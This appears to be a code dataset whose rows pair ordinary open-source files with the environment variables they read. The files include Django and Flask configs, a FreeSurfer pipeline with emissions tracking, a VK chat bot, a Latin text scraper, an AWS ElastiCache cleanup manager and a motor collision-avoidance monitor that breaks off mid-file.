] | [] | [
"KW_SLACK_CHANNEL",
"KW_SLACK_TOKEN"
] | [] | ["KW_SLACK_CHANNEL", "KW_SLACK_TOKEN"] | go | 2 | 0 | |
example/src/dogs/dog-1.go | package dogs
// Snickers is
func Snickers() string {
return "Brooklyn Says Hi!"
} | [] | [] | [] | [] | [] | go | null | null | null |
run_scripts/FreeSurfer/nipype_reconall_with_tracker.py | # Import modules
import os
import sys
from os.path import join as opj
import pandas as pd
import time
from nipype.interfaces.freesurfer import ReconAll
from nipype.interfaces.utility import IdentityInterface
from nipype.pipeline.engine import Workflow, Node
from pypapi import events, papi_high as high
import argparse
# Add paths (singularity should see these)
# FastSurfer and carbon trackers are in the mounted dir as these repos keep getting updated.
# TODO replace this with setup.py once the dependencis become stable
# sys.path.append('../../../experiment-impact-tracker/')
# sys.path.append('../../../codecarbon/')
from experiment_impact_tracker.compute_tracker import ImpactTracker
from codecarbon import EmissionsTracker, OfflineEmissionsTracker
def get_reconall(recon_directive,fs_folder):
# This node represents the actual recon-all command
reconall = Node(ReconAll(directive=recon_directive,
flags='-nuintensitycor -3T',
subjects_dir=fs_folder),
name="reconall")
return reconall
# This function returns for each subject the path to struct.nii.gz
def pathfinder(subject, foldername, filename):
from os.path import join as opj
struct_path = opj(foldername, subject, filename)
return struct_path
def main():
# setup
exp_start_time = time.time()
# argparse
parser = argparse.ArgumentParser(description='Script to run freesurfer reconall with nipype and track compute costs', epilog='$Id: fast_surfer_cnn, v 1.0 2019/09/30$')
# Data
parser.add_argument('--experiment_dir', dest='experiment_dir', help='path to directory to store freesurfer derived data.')
parser.add_argument('--data_dir', help="path to input data", default='/neurohub/ukbb/imaging/')
parser.add_argument('--subject_id', dest='subject_id', help='subject_id')
parser.add_argument('--T1_identifier', help='T1 identifier string relateive to the subject directory')
# FreeSurfer
parser.add_argument('--recon_directive', dest='recon_directive', help='recon_directive (autorecon 1, 2, or 3)', default='1') #MTL
# Trackers
parser.add_argument('--tracker_log_dir', dest='tracker_log_dir',
help="log dir for experiment impact tracker",
type=str, default='./tracker_logs/')
parser.add_argument('--geo_loc', dest='geo_loc',
help="(lat,log) coords for experiment impact tracker",
type=str, default='45.4972159,-73.6103642') #MTL Beluga
parser.add_argument('--CC_offline',
help="Run CC in offline mode",
action='store_true')
parser.add_argument('--TZ', dest='TZ',
help="TimeZone",
type=str, default='America/New_York')
parser.add_argument('--iso_code', dest='iso_code',
help="Country ISO code",
type=str, default='USA')
# PAPI
parser.add_argument('--count_FLOPs', dest='count_FLOPs',help="Count FLOPs using PAPI",action='store_true')
args = parser.parse_args()
# Data
experiment_dir = args.experiment_dir
data_dir = args.data_dir
subject_id = args.subject_id
T1_identifier = args.T1_identifier
# FreeSurfer
recon_directive = args.recon_directive
# FLOPs
count_FLOPs = args.count_FLOPs
# Trackers
tracker_log_dir = args.tracker_log_dir
geo_loc = args.geo_loc
CC_offline = args.CC_offline
TZ = args.TZ
iso_code = args.iso_code
print(f'Using offline mode for CC tracker: {CC_offline}')
if CC_offline:
print(f'Using {TZ} timezone and {iso_code} country iso code')
print(f'Starting subject: {subject_id}')
# Set up the trackers
log_dir = '{}/{}/'.format(tracker_log_dir,subject_id)
log_dir_EIT = f'{log_dir}/EIT/'
log_dir_CC = f'{log_dir}/CC/'
for d in [log_dir_EIT,log_dir_CC]:
if not os.path.exists(d):
os.makedirs(d)
# Use specified geo location for the HPC
ly,lx = float(geo_loc.split(',')[0]), float(geo_loc.split(',')[1])
coords = (ly,lx)
print(f'Using geographical coordinates (long,lat): {coords}')
# EIT tracker
tracker_EIT = ImpactTracker(log_dir_EIT,coords)
tracker_EIT.launch_impact_monitor()
# CodeCarbon tracker
os.environ['TZ']= TZ
if CC_offline:
tracker_CC = OfflineEmissionsTracker(output_dir=log_dir_CC, country_iso_code=iso_code)
else:
tracker_CC = EmissionsTracker(output_dir=log_dir_CC)
tracker_CC.start()
if count_FLOPs:
print('Counting flops using PAPI')
flop_csv = tracker_log_dir + 'compute_costs_flop.csv'
flop_df = pd.DataFrame(columns=['task','start_time','duration','DP'])
# Start FS processing for a given subject
subject_list = [subject_id]
fs_folder = opj(experiment_dir, 'freesurfer') # location of freesurfer folder
# Create the output folder - FreeSurfer can only run if this folder exists
os.system('mkdir -p %s' % fs_folder)
# Specify recon workflow stages
if recon_directive == 'all':
recon_directives = ['autorecon1','autorecon2','autorecon3']
else:
recon_directives = [recon_directive]
for r, recon_directive in enumerate(recon_directives):
print('\nStarting stage: {}'.format(recon_directive))
# Create the pipeline that runs the recon-all command
reconflow = Workflow(name="reconflow")
reconflow.base_dir = opj(experiment_dir, 'workingdir_reconflow')
# Some magical stuff happens here (not important for now)
infosource = Node(IdentityInterface(fields=['subject_id']), name="infosource")
infosource.iterables = ('subject_id', subject_list)
# Specify recon-all stage based on recon-directive
reconall = get_reconall(recon_directive, fs_folder)
# This section connects all the nodes of the pipeline to each other
reconflow.connect([(infosource, reconall, [('subject_id', 'subject_id')]),
(infosource, reconall, [(('subject_id', pathfinder,
data_dir, T1_identifier),
'T1_files')]),
])
if count_FLOPs:
# start flop counter
start_time = time.time()
high.start_counters([events.PAPI_DP_OPS,]) #default: PAPI_FP_OPS
# This command runs the recon-all pipeline in parallel (using n_procs cores)
# reconflow.run('MultiProc', plugin_args={'n_procs': 4})
reconflow.run()
if count_FLOPs:
# stop flop counter
DP = high.stop_counters()[0]
end_time = time.time()
duration = end_time - start_time
print('Duration: {}, Flops: {}'.format(duration, DP))
flop_df.loc[r] = [recon_directive,start_time, duration, DP]
## code-carbon tracker
tracker_CC.stop()
if count_FLOPs:
flop_df.to_csv(flop_csv)
if __name__=='__main__':
main()
| [] | [] | [
"TZ"
] | [] | ["TZ"] | python | 1 | 0 | |
examples/high-level/labeler_setup.py | import os
from typing import List
from vkbottle import ABCRule, BaseStateGroup, VKAPIError
from vkbottle.bot import Bot, BotLabeler, Message
# A simple rule to demonstrate labeler
# setup for custom rules later
class SpamRule(ABCRule):
def __init__(self, chars: List[str]):
self.chars = "".join(chars)
async def check(self, message: Message):
return len(message.text) and message.text.strip(self.chars) == ""
# Create a bot, or a single labeler:
# from vkbottle.bot import BotLabeler
# labeler = BotLabeler()
bot = Bot(os.environ["token"])
# Labeler can be accessed with bot.labeler
# or with bot.on (.on is property which returns
# .labeler, this shortcut is cute legacy from
# vkbottle 2.x
# This is first shortcut for VBMLRule from custom_rules
# <vbml_ignore_case = True> makes get_vbml_rule to add
# re.IGNORECASE to flags
bot.labeler.vbml_ignore_case = True
# You can add default flags if ignore case is False
# <bot.labeler.default_flags = ...>
# We can add rule to custom_rules and it will be accessible
# in handlers in any place but is it of importance that
# labeler is always local (shortcuts work only for a local
# instance, for eg Bot, Blueprint, or pure Labeler)
bot.labeler.custom_rules["spam"] = SpamRule
# BotLabeler has fixed views. If you want to add yours you need
# to implement custom labeler, take it in account that labeler
# views are GLOBAL(!)
bot.labeler.views() # {"message": MessageView, "raw": RawEventView}
bot.labeler.load(BotLabeler()) # Labeler can be loaded in another labeler
# Patcher for vbml rule shortcut can be set:
# <bot.labeler.patcher = ...>
# We will add some states
# The comments for states are skipped because
# we have another topic of the example
class SpamState(BaseStateGroup):
GOOD = 1
BAD = 2
# Lets add some handlers
@bot.on.chat_message(spam=["!", ".", "?", "$", "#", "@", "%"])
async def spam_handler(message: Message):
state_peer = await bot.state_dispenser.get(message.from_id)
if state_peer and state_peer.state == SpamState.BAD:
try:
await bot.api.messages.remove_chat_user(message.peer_id - 2e9, message.from_id)
return "Как можно игнорировать мои просьбы"
except VKAPIError(15):
return "Где мои права администратора?"
await message.answer("Пожалуйста перестаньте спамить")
await bot.state_dispenser.set(message.from_id, SpamState.BAD)
@bot.on.message(text="прости меня")
async def forgive_handler(message: Message):
await bot.state_dispenser.set(message.from_id, SpamState.GOOD)
return "Ладно, извинения приняты"
bot.run_forever()
| [] | [] | [
"token"
] | [] | ["token"] | python | 1 | 0 | |
app/app/settings.py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9=01-nw4hr6$%n6f!axxwaxds_m)m#fjxigsatgcondr$we==$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
## 'ENGINE': 'django.db.backends.sqlite3',
## 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| [] | [] | [
"DB_PASS",
"DB_USER",
"DB_NAME",
"DB_HOST"
] | [] | ["DB_PASS", "DB_USER", "DB_NAME", "DB_HOST"] | python | 4 | 0 | |
backend/manage.py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cryptogramx_33764.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
phyllo/extractors/theodosiusDB.py | import sqlite3
import urllib
import re
from urllib.request import urlopen
from bs4 import BeautifulSoup
from phyllo.phyllo_logger import logger
# seems to work fine
# should probably check on chapter divisions
def getBooks(soup):
siteURL = 'http://www.thelatinlibrary.com'
textsURL = []
# get links to books in the collection
for a in soup.find_all('a', href=True):
link = a['href']
textsURL.append("{}/{}".format(siteURL, a['href']))
# remove unnecessary URLs
while ("http://www.thelatinlibrary.com/index.html" in textsURL):
textsURL.remove("http://www.thelatinlibrary.com/index.html")
textsURL.remove("http://www.thelatinlibrary.com/classics.html")
try:
textsURL.remove("http://thelatinlibrary.com/ius.html")
except:
pass
logger.info("\n".join(textsURL))
return textsURL
def main():
# The collection URL below.
collURL = 'http://thelatinlibrary.com/theodosius.html'
collOpen = urllib.request.urlopen(collURL)
collSOUP = BeautifulSoup(collOpen, 'html5lib')
author = "Theodosius"
colltitle = collSOUP.title.string.strip()
date = "no date found"
textsURL = getBooks(collSOUP)
with sqlite3.connect('texts.db') as db:
c = db.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS texts (id INTEGER PRIMARY KEY, title TEXT, book TEXT,'
' language TEXT, author TEXT, date TEXT, chapter TEXT, verse TEXT, passage TEXT,'
' link TEXT, documentType TEXT)')
c.execute("DELETE FROM texts WHERE author = 'Theodosius'")
for url in textsURL:
openurl = urllib.request.urlopen(url)
textsoup = BeautifulSoup(openurl, 'html5lib')
title = textsoup.title.string.strip()
print(title)
chapter = -1
verse = 0
getp = textsoup.find_all('p')
for p in getp:
try:
if p['class'][0].lower() in ['border', 'pagehead', 'shortborder', 'smallborder', 'margin',
'internal_navigation']: # these are not part of the main text
continue
except:
pass
if p.find('br') is not None:
# these are chapter/verse lists
# probably redundant
continue
verses = []
pstring = p.get_text()
pstring = pstring.strip()
if pstring.startswith("CTh"):
# this is either a chapter or verse heading
if '0' in re.split('\.', pstring):
# this is a chapter heading
chapter = pstring
continue
else:
verse = pstring
continue
verses.append(pstring)
for v in verses:
if v.startswith('Theodosian Code'):
continue
if v.startswith('The Latin Library'):
continue
if v is None or v == '' or v.isspace():
continue
c.execute("INSERT INTO texts VALUES (?,?,?,?,?,?,?, ?, ?, ?, ?)",
(None, colltitle, title, 'Latin', author, date, chapter,
verse, v.strip(), url, 'prose'))
if __name__ == '__main__':
main()
| [] | [] | [] | [] | [] | python | null | null | null |
config.py | import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'secretkey'
MAIL_SERVER = os.environ.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(os.environ.get('MAIL_PORT', '587'))
MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS', 'true').lower() in \
['true', 'on', '1']
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky]'
FLASKY_MAIL_SENDER = 'Flasky Admin <[email protected]>'
FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
FLASKY_POSTS_PER_PAGE = os.environ.get('FLASKY_POSTS_PER_PAGE') or 25
FLASKY_FOLLOWERS_PER_PAGE = os.environ.get('FLASKY_FOLLOWERS_PER_PAGE') or 15
FLASKY_COMMENTS_PER_PAGE = os.environ.get('FLASKY_COMMENTS_PER_PAGE') or 30
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_RECORD_QUERIES = True
FLASKY_SLOW_DB_QUERY_TIME = 0.5
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite://'
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
| [] | [] | [
"FLASKY_FOLLOWERS_PER_PAGE",
"FLASKY_POSTS_PER_PAGE",
"MAIL_SERVER",
"MAIL_PASSWORD",
"DEV_DATABASE_URL",
"DATABASE_URL",
"FLASKY_ADMIN",
"MAIL_PORT",
"SECRET_KEY",
"MAIL_USERNAME",
"MAIL_USE_TLS",
"TEST_DATABASE_URL",
"FLASKY_COMMENTS_PER_PAGE"
] | [] | ["FLASKY_FOLLOWERS_PER_PAGE", "FLASKY_POSTS_PER_PAGE", "MAIL_SERVER", "MAIL_PASSWORD", "DEV_DATABASE_URL", "DATABASE_URL", "FLASKY_ADMIN", "MAIL_PORT", "SECRET_KEY", "MAIL_USERNAME", "MAIL_USE_TLS", "TEST_DATABASE_URL", "FLASKY_COMMENTS_PER_PAGE"] | python | 13 | 0 | |
pkg/aws/manager_elasticache.go | package aws
import (
"strings"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/elasticache"
"github.com/aws/aws-sdk-go/service/elasticache/elasticacheiface"
"github.com/aws/aws-sdk-go/service/resourcegroupstaggingapi"
"github.com/aws/aws-sdk-go/service/resourcegroupstaggingapi/resourcegroupstaggingapiiface"
"github.com/integr8ly/cluster-service/pkg/clusterservice"
"github.com/integr8ly/cluster-service/pkg/errors"
"github.com/sirupsen/logrus"
)
var _ ClusterResourceManager = &ElasticacheManager{}
type ElasticacheManager struct {
elasticacheClient elasticacheiface.ElastiCacheAPI
taggingClient resourcegroupstaggingapiiface.ResourceGroupsTaggingAPIAPI
logger *logrus.Entry
}
func NewDefaultElasticacheManager(session *session.Session, logger *logrus.Entry) *ElasticacheManager {
return &ElasticacheManager{
elasticacheClient: elasticache.New(session),
taggingClient: resourcegroupstaggingapi.New(session),
logger: logger.WithField(loggingKeyManager, managerElasticache),
}
}
func (r *ElasticacheManager) GetName() string {
return "AWS ElastiCache Manager"
}
//Delete all elasticache resources for a specified cluster
func (r *ElasticacheManager) DeleteResourcesForCluster(clusterId string, tags map[string]string, dryRun bool) ([]*clusterservice.ReportItem, error) {
logger := r.logger.WithFields(logrus.Fields{"clusterId": clusterId, "dryRun": dryRun})
logger.Debug("deleting resources for cluster")
var reportItems []*clusterservice.ReportItem
var replicationGroupsToDelete []string
resourceInput := &resourcegroupstaggingapi.GetResourcesInput{
ResourceTypeFilters: aws.StringSlice([]string{"elasticache:cluster"}),
TagFilters: convertClusterTagsToAWSTagFilter(clusterId, tags),
}
resourceOutput, err := r.taggingClient.GetResources(resourceInput)
if err != nil {
return nil, errors.WrapLog(err, "failed to describe cache clusters", logger)
}
for _, resourceTagMapping := range resourceOutput.ResourceTagMappingList {
arn := aws.StringValue(resourceTagMapping.ResourceARN)
arnSplit := strings.Split(arn, ":")
cacheClusterId := arnSplit[len(arnSplit)-1]
cacheClusterInput := &elasticache.DescribeCacheClustersInput{
CacheClusterId: aws.String(cacheClusterId),
}
cacheClusterOutput, err := r.elasticacheClient.DescribeCacheClusters(cacheClusterInput)
if err != nil {
return nil, errors.WrapLog(err, "cannot get cacheCluster output", logger)
}
for _, cacheCluster := range cacheClusterOutput.CacheClusters {
rgLogger := logger.WithField("replicationGroup", cacheCluster.ReplicationGroupId)
if contains(replicationGroupsToDelete, *cacheCluster.ReplicationGroupId) {
rgLogger.Debugf("replication Group already exists in deletion list (%s=%s)", *cacheCluster.ReplicationGroupId, clusterId)
break
}
replicationGroupsToDelete = append(replicationGroupsToDelete, *cacheCluster.ReplicationGroupId)
}
}
logger.Debugf("filtering complete, %d replicationGroups matched", len(replicationGroupsToDelete))
for _, replicationGroupId := range replicationGroupsToDelete {
//delete each replication group in the list
rgLogger := logger.WithField("replicationGroupId", aws.String(replicationGroupId))
rgLogger.Debugf("building report for database")
reportItem := &clusterservice.ReportItem{
ID: replicationGroupId,
Name: "elasticache Replication group",
Action: clusterservice.ActionDelete,
ActionStatus: clusterservice.ActionStatusInProgress,
}
reportItems = append(reportItems, reportItem)
if dryRun {
rgLogger.Debug("dry run enabled, skipping deletion step")
reportItem.ActionStatus = clusterservice.ActionStatusDryRun
continue
}
rgLogger.Debug("performing deletion of replication group")
replicationGroupDescribeInput := &elasticache.DescribeReplicationGroupsInput{
ReplicationGroupId: &replicationGroupId,
}
replicationGroup, err := r.elasticacheClient.DescribeReplicationGroups(replicationGroupDescribeInput)
if err != nil {
return nil, errors.WrapLog(err, "cannot describe replicationGroups", logger)
}
//deleting will return an error if the replication group is already in a deleting state
if len(replicationGroup.ReplicationGroups) > 0 &&
aws.StringValue(replicationGroup.ReplicationGroups[0].Status) == statusDeleting {
rgLogger.Debugf("deletion of replication Groups already in progress")
reportItem.ActionStatus = clusterservice.ActionStatusInProgress
continue
}
deleteReplicationGroupInput := &elasticache.DeleteReplicationGroupInput{
ReplicationGroupId: aws.String(replicationGroupId),
RetainPrimaryCluster: aws.Bool(false),
}
if _, err := r.elasticacheClient.DeleteReplicationGroup(deleteReplicationGroupInput); err != nil {
return nil, errors.WrapLog(err, "failed to delete elasticache replication group", logger)
}
}
if reportItems != nil {
return reportItems, nil
}
return nil, nil
}
func contains(arr []string, targetValue string) bool {
for _, element := range arr {
if element != "" && element == targetValue {
return true
}
}
return false
}
| [] | [] | [] | [] | [] | go | null | null | null |
Models_II_Relaciones/Models_II_Relaciones/asgi.py | """
ASGI config for Models_II_Relaciones project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Models_II_Relaciones.settings')
application = get_asgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
CollisionAvoidanceMonitor/main.py | import sys
import os
import ode
import logging
import threading
from time import sleep, time
from genie_python.genie_startup import *
import pv_server
import render
from configurations import config_zoom as config
from collide import collide, CollisionDetector
from geometry import GeometryBox
from move import move_all
sys.path.insert(0, os.path.abspath(os.environ["MYDIRCD"]))
from monitor import Monitor
from server_common.loggers.isis_logger import IsisLogger
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(threadName)-2s) %(message)s',
)
def auto_seek(start_step_size, start_values, end_value, geometries, moves, axis_index, ignore, fine_step=None):
limit = end_value
current_value = start_values[axis_index]
if current_value == end_value:
return end_value
values = start_values[:]
last_value = None
old_points = None
step_checked = False
if current_value < end_value:
# Going up
def comp(a, b):
return a < b
step_size = abs(start_step_size)
else:
# Going down
def comp(a, b):
return a > b
step_size = -abs(start_step_size)
while last_value is None or comp(last_value, end_value):
# Move if we need to
if last_value is not None:
current_value += step_size
# print "Using step size of %f" % step_size
else:
current_value = start_values[axis_index]
if not comp(current_value, end_value):
current_value = end_value
values[axis_index] = current_value
move_all(geometries, moves, values=values[:])
# Check nothing moved too far
if step_checked is False:
new_points = [g.get_vertices() for g in geometries]
if old_points is not None:
delta = max_delta(geometries, new_points, old_points)
if delta > start_step_size:
# Work out a new step size
step_size *= start_step_size/delta
last_value = None
continue
step_checked = True
# Check for collisions
collisions = collide(geometries, ignore)
if any(collisions):
if current_value == start_values[axis_index]:
# There was already a collision
limit = current_value
break
elif fine_step and fine_step < step_size:
start_values[axis_index] = last_value
limit = auto_seek(fine_step, start_values, current_value, geometries, moves, axis_index, ignore)
else:
limit = last_value
break
old_points = new_points[:]
last_value = current_value
# print "Found limits for axis %d using step size of %f" % (axis_index, step_size)
if limit is None:
raise ValueError("Null limit")
return limit
def max_delta(geometries, new_points, old_points):
# Calculate the greatest position deltas
delta = 0
for j in range(len(geometries)):
old = old_points[j]
new = new_points[j]
deltas = [map(float, n - o) for n, o in zip(new, old)]
for i, (x, y, z) in enumerate(deltas):
mag = float(x) ** 2 + float(y) ** 2 + float(z) ** 2
if mag > delta:
delta = mag
# print "New max delta of %f (%f, %f, %f) for body %d at %s from %s" % \
# (mag ** 0.5, x, y, z, j, new[i], old[i])
delta = float(delta) ** 0.5
return delta
def compare(sign):
if sign > 0:
return lambda a, b: a > b
else:
return lambda a, b: a < b
def auto_seek_limits(geometries, ignore, moves, values, limits, coarse=1.0, fine=0.1):
dynamic_limits = []
for i in range(len(values)):
logging.debug("Seeking for axis %d" % i)
lower_limit = auto_seek(coarse, values[:], min(limits[i]), geometries, moves, i, ignore, fine)
upper_limit = auto_seek(coarse, values[:], max(limits[i]), geometries, moves, i, ignore, fine)
dynamic_limits.append([lower_limit, upper_limit])
logging.debug("Found limits for axis %d at %s, %s" % (i, upper_limit, lower_limit))
return dynamic_limits
def look_ahead(start_values, pvs, is_moving, geometries, moves, ignore, max_movement=1.0, max_time=10., time_step=0.1):
# Get the indices of the axes currently moving
moving = [i for i, m in enumerate(is_moving) if m == 0] # DMOV = 0 when motors not moving
msg = "No collisions predicted in the next %fs" % max_time
safe_time = max_time
safe = True
# Only worth calculating if more than one axis is moving
if len(moving) > 1:
set_points = [None] * len(pvs)
speeds = [None] * len(pvs)
directions = [None] * len(pvs)
# Assume everything has finished moving
move_complete = [True] * len(pvs)
# Get some settings:
for i in moving:
pv = pvs[i]
set_point = get_pv(pv + '.DVAL')
speed = get_pv(pv + '.VELO')
direction = 0.
move = set_point - start_values[i]
if move > 0:
direction = 1.
if move < 0:
direction = -1.
set_points[i] = set_point
speeds[i] = speed
directions[i] = direction
# This axis has not finished moving!
move_complete[i] = False
current_time = 0.
values = start_values[:]
old_points = None
step_checked = False
last_time = None
while current_time < max_time:
if last_time is None:
values = start_values[:]
current_time = 0.
old_points = None
else:
current_time += time_step
for i in moving:
if move_complete[i] is False:
values[i] = start_values[i] + (directions[i] * speeds[i] * current_time)
comp = compare(directions[i])(values[i], set_points[i])
if comp:
values[i] = set_points[i]
# Move the bodies
move_all(geometries, moves, values=values)
if step_checked is False:
new_points = [g.get_vertices() for g in geometries]
if old_points is not None:
delta = max_delta(geometries, new_points, old_points)
if delta > max_movement:
# Reduce the size of the time step
time_step *= max_movement/delta
# Reset to starting point
last_time = None
old_points = None
continue
step_checked = True
# Check for collisions
collisions = collide(geometries, ignore)
if any(collisions):
if last_time is None:
msg = "There is already a collision"
safe_time = 0.
else:
msg = "Collision expected in %.1fs - %.1fs" % (last_time, current_time)
safe_time = last_time
safe = False
break
old_points = new_points[:]
last_time = current_time
return msg, safe_time, safe
# Set the high and low dial limits for each motor
def set_limits(limits, pvs):
for limit, pv in zip(limits, pvs):
set_pv(pv + '.DLLM', limit[0])
set_pv(pv + '.DHLM', limit[1])
# Contains operating mode events
class OperatingMode(object):
def __init__(self):
# Close event to be triggered by the render thread
self.close = threading.Event()
# Set dynamic limits automatically
self.set_limits = threading.Event()
# Stop the motors on a collision
self.auto_stop = threading.Event()
# Re-calculate limits on demand
self.calc_limits = threading.Event()
def get_operation_mode(self):
return self.auto_stop.is_set(), self.set_limits.is_set(), self.close.is_set()
def set_operation_mode(self, auto_stop, set_limits, close):
if auto_stop:
self.auto_stop.set()
else:
self.auto_stop.clear()
if set_limits:
self.set_limits.set()
else:
self.set_limits.clear()
if close:
self.close.set()
else:
self.close.clear()
# The main routine to execute
def main():
# Load config:
colors = config.colors
moves = config.moves
ignore = config.ignore
pvs = config.pvs
config_limits = config.hardlimits
old_limits = config_limits[:]
# Create space objects for the live and rendered world
space = ode.Space()
render_space = ode.Space()
collision_space = ode.Space()
# Create and populate lists of geometries
geometries = []
render_geometries = []
collision_geometries = []
for i, geometry in enumerate(config.geometries):
geometries.append(GeometryBox(space, oversize=config.oversize, **geometry))
render_geometries.append(GeometryBox(render_space, **geometry))
collision_geometries.append(GeometryBox(collision_space, oversize=config.oversize, **geometry))
# Create and populate two lists of monitors
monitors = []
is_moving = []
for pv in pvs:
m = Monitor(pv + ".DRBV")
m.start()
monitors.append(m)
any_moving = Monitor(pv + ".DMOV")
any_moving.start()
is_moving.append(any_moving)
# Create a shared operating mode object to control the main thread
op_mode = OperatingMode()
# Set the default behaviour to set_limits as calculated, and auto_stop on collision
op_mode.set_limits.set()
op_mode.auto_stop.set()
# Start a logger
logger = IsisLogger()
# Create a shared render parameter object to update the render thread
parameters = render.RenderParams()
if 'blind' not in sys.argv:
# Initialise the render thread, and set it to daemon - won't prevent the main thread from exiting
renderer = render.Renderer(parameters, render_geometries, colors, monitors, pvs, moves, op_mode)
renderer.daemon = True
# Need to know if this is the first execution of the main loop
op_mode.calc_limits.set()
# Initialise the pv server
# Loop over the pvdb and update the counts based on the number of aves/bodies
for pv in pv_server.pvdb:
for key, val in pv_server.pvdb[pv].items():
if key == 'count':
if val is pv_server.axis_count:
pv_server.pvdb[pv]['count'] = len(config.pvs)
if val is pv_server.body_count:
pv_server.pvdb[pv]['count'] = len(config.geometries)
driver = pv_server.start_thread(config.control_pv, op_mode)
driver.setParam('OVERSIZE', config.oversize)
driver.setParam('COARSE', config.coarse)
driver.setParam('FINE', config.fine)
driver.setParam('NAMES', [g['name'] for g in config.geometries])
# Only report for new collisions
collision_detector = CollisionDetector(driver, collision_geometries, config.moves, monitors, config.ignore,
is_moving, logger, op_mode, config.pvs)
collision_detector.start()
# Main loop
while True:
# Freeze the positions of our current monitors by creating some dummies
# This stops the threads from trying to reading each monitor sequentially, and holding each other up
frozen = [m.value() for m in monitors]
# Execute the move
move_all(geometries, moves, values=frozen)
# Check if the oversize has been changed, ahead of any collision calcs
if driver.new_data.isSet():
for geometry, collision_geometry in zip(geometries, collision_geometries):
geometry.set_size(oversize=driver.getParam('OVERSIZE'))
collision_geometry.set_size(oversize=driver.getParam('OVERSIZE'))
driver.new_data.clear()
op_mode.calc_limits.set()
if driver.getParam("CALC") != 0:
op_mode.calc_limits.set()
collisions = collision_detector.collisions[:]
collision_message = collision_detector.message[:]
# Check if there have been any changes to the .MOVN monitors
fresh = any([m.fresh() for m in is_moving])
# Check if any of the motors monitors are moving
moving = [not m.value() for m in is_moving] # Invert because DMOV is inverted from MOVN
any_moving = any(moving)
new_limits = []
if fresh or any_moving or op_mode.calc_limits.isSet():
# Look ahead some time to see if any collisions are going to happen in the future
